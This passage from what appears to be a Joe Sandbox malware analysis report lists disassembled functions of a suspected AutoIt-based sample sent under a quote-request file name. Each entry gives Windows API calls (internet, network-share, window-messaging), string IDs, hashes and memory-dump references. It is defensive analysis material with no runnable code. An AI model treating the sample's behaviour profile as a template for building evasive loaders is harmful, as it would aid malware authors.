                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                        • String ID: AutoIt3GUI$Container
                                                        • API String ID: 2652923123-3941886329
                                                        • Opcode ID: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                                                        • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                        • Opcode Fuzzy Hash: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                                                        • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                        Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove_strncmp
                                                        • String ID: U$\
                                                        • API String ID: 2666721431-100911408
                                                        • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                        • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                        • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                        • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                        Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                        • __wcsnicmp.LIBCMT ref: 00467288
                                                        • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                        • String ID: LPT
                                                        • API String ID: 3035604524-1350329615
                                                        • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                        • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                        • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                        • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                        Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: \$h
                                                        • API String ID: 4104443479-677774858
                                                        • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                        • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                        • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                        • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                        Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID: &
                                                        • API String ID: 2931989736-1010288
                                                        • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                        • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                        • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                        • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                        Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: \
                                                        • API String ID: 4104443479-2967466578
                                                        • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                        • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                        • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                        • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                        Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00466825
                                                        • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_wcslen
                                                        • String ID: |
                                                        • API String ID: 596671847-2343686810
                                                        • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                        • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                        • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                        • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                        Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '
                                                        • API String ID: 3850602802-1997036262
                                                        • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                        • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                        • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                        • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                        Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _strlen.LIBCMT ref: 0040F858
                                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                        • _sprintf.LIBCMT ref: 0040F9AE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_sprintf_strlen
                                                        • String ID: %02X
                                                        • API String ID: 1921645428-436463671
                                                        • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                        • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                        • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                        • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                        Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                        • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                        • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                        • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                        Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                        • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                        • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                        • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                        Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                        • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                        • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                        • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                        Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: htonsinet_addr
                                                        • String ID: 255.255.255.255
                                                        • API String ID: 3832099526-2422070025
                                                        • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                        • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                        • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                        • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                        Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: InternetOpen
                                                        • String ID: <local>
                                                        • API String ID: 2038078732-4266983199
                                                        • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                        • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                        • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                        • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                        Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock_memmove
                                                        • String ID: EA06
                                                        • API String ID: 1988441806-3962188686
                                                        • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                        • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                        • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                        • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                        Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
